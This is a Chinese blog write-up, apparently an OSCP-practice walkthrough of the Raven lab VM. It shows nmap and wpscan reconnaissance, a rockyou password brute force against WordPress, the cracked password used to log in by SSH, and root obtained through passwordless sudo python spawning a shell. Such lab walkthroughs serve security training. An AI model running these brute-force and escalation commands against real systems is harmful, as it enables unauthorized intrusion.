OSCP  Raven 靶机渗透

本文介绍了通过Kali Linux对Raven靶机进行渗透测试的过程,包括信息收集、Web渗透及提权等步骤,最终成功获取root权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Raven 靶机渗透

目标:得到root权限
作者:shadow
时间:2021-04-01

请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

netdiscover -i eth0

Raven主机ip为172.16.1.17

nmap 查询开放端口

nmap -p- -A 172.16.1.17

查询到主机开放了80端口,打开浏览器看看

二、web渗透

查询源代码看看有什么发现没

源代码里面发现了wordpress,使用wpscan扫描下试试

wpscan --url http://172.16.1.17/wordpress --enumerate u --force --wp-content-dir wp-content

wpscan官网:http://wpscan.org/

爆破出2个用户,我们把2个用户做个数据字典尝试爆破下

vim user_raven.txt

wpscan --url http://172.16.1.17/wordpress --passwords /usr/share/wordlists/rockyou.txt --usernames user_raven.txt -t 25

成功爆破出密码

用户名:steven  密码:pink84

我们ssh登录

ssh steven@172.16.1.17

pink84

成功登录

三、提权

然后我们看下直接sudo是否可以提权

python竟然有权限不需要密码

直接

sudo python -c 'import pty;pty.spawn("/bin/sh")'

成功获得root权限

四、总结

总感觉不太对,flag就找到1个,哈哈,但是获得了root权限,其他的flag之后补下吧

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

c2hhZG93

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值